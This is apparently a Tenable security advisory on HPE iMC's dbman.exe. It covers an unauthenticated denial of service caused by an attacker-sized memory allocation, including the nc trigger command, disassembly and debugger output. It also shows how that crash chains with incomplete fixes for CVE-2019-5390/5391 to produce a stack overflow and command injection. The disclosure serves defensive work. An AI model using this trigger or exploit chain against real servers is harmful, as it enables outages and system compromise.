Unauthenticated Remote Denial of Service (DoS)
The flaw exists in the CDataConnStreamQueueT::deal_msg method in dbman.exe where the C++ new operator is used to allocate memory with the allocation size specified by the attacker:
.text:0045AD95 mov eax, dword ptr [ebp+var_first4bytes]; attacker-controlled .text:0045AD98 add eax, 1 .text:0045AD9B push eax ; unsigned int .text:0045AD9C call [email protected]@Z ; operator new(uint)
The attacker can specify a large allocation size (i.e., 0xfffffff0) by sending the following data to dbman:
echo -ne '\xff\xff\xff\x00' | nc
Which could cause an exception thrown by the new operator:
0:005> g (1b0c.1ab4): C++ EH exception - code e06d7363 (first chance) (1b0c.1ab4): C++ EH exception - code e06d7363 (!!! second chance !!!) eax=0257d7c8 ebx=00000021 ecx=00000003 edx=00000000 esi=7448c164 edi=00000218 eip=7629c1a2 esp=0257d7c8 ebp=0257d824 iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212 KERNELBASE!RaiseException+0x62: 7629c1a2 8b4c2454 mov ecx,dword ptr [esp+54h] ss:002b:0257d81c=339b14f7 0:001> kb # ChildEBP RetAddr Args to Child 00 0257d824 7444df60 e06d7363 00000001 00000003 KERNELBASE!RaiseException+0x62 01 0257d85c 74453efd 0257d86c 7447d604 743f2a10 MSVCR90!_CxxThrowException+0x48 [f:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\throw.cpp @ 161] 02 0257d878 0045ada1 ffffff01 45e63853 00000000 MSVCR90!operator new+0x64 [f:\dd\vctools\crt_bld\self_x86\crt\src\new.cpp @ 63] WARNING: Stack unwind information not available. Following frames may be wrong. 03 0257fd38 00461415 02320628 02320628 004c7144 dbman+0x5ada1 04 0257fd4c 70e7c3c9 00000218 00000054 00000000 dbman+0x61415
And the dbman process does not appear to handle the exception, resulting in process termination.
Incomplete Fixes for CVE-2019-5390 and CVE-2019-5391
The root cause of these vulnerabilities was not addressed in 7.3 E0703.
In exploitation scenarios, the attacker would first send a command 10018 (for dbman.conf variable injection) followed by a command 10000 (for dbman.conf reloading). This would be enough to trigger the stack overflow. However, with the command injection, an additional command 10002 would have to be sent to trigger a backup.
HPE iMC version 7.3 E0703 introduced changes to enforce commands 10000 and 10002 to be encrypted while allowing unencrypted command 10018. The attacker can still send a command 10018 to inject configuration variables into dbman.conf, but he/she can not send commands 10000 or 10002 without an encryption key.
However, the attacker can use the DoS vulnerability described above to kill the dbman process, forcing a restart. It's been observed that the restart happens automatically under imcsysdm.exe if the Intelligent Deployment Monitoring Agent has started (a likely production configuration). When dbman restarts with the modified dbman.conf containing a long BackHoseIp variable, stack buffer overflow occurs. Additionally, the BackupTime and BackupTimeMinute variable values can be set in the 10018 request to schedule an automated backup. This is enough to trigger the command injection.
STATUS_STACK_BUFFER_OVERRUN encountered (990.123c): Break instruction exception - code 80000003 (first chance) *** ERROR: Symbol file could not be found. Defaulted to export symbols for dbman.exe - eax=00000000 ebx=00000001 ecx=76275108 edx=0000002b esi=00000000 edi=00000000 eip=7631d74a esp=0019a32c ebp=0019a3b4 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 KERNELBASE!UnhandledExceptionFilter+0x5a: 7631d74a cc int 3 0:000> kb # ChildEBP RetAddr Args to Child 00 0019a3b4 004a9859 004cb258 721993ca 8de66c35 KERNELBASE!UnhandledExceptionFilter+0x5a WARNING: Stack unwind information not available. Following frames may be wrong. 01 0019a6e8 0044dabb 0019a97c 0019a97c 0019a998 dbman!std::_Init_locks::operator=+0xcd1 02 0019b068 41414141 41414141 41414141 41414141 dbman+0x4dabb 03 0019b06c 41414141 41414141 41414141 41414141 0x41414141 04 0019b070 41414141 41414141 41414141 41414141 0x41414141 ... And the !exploitable WinDbg extension command shows it's exploitable: 0:000> .load msec.dll 0:000> !exploitable !exploitable 188.8.131.52 Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at KERNELBASE!UnhandledExceptionFilter+0x000000000000005a (Hash=0xdaf335ab.0xf6a1be01) Corruption of the exception handler chain is considered exploitable
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]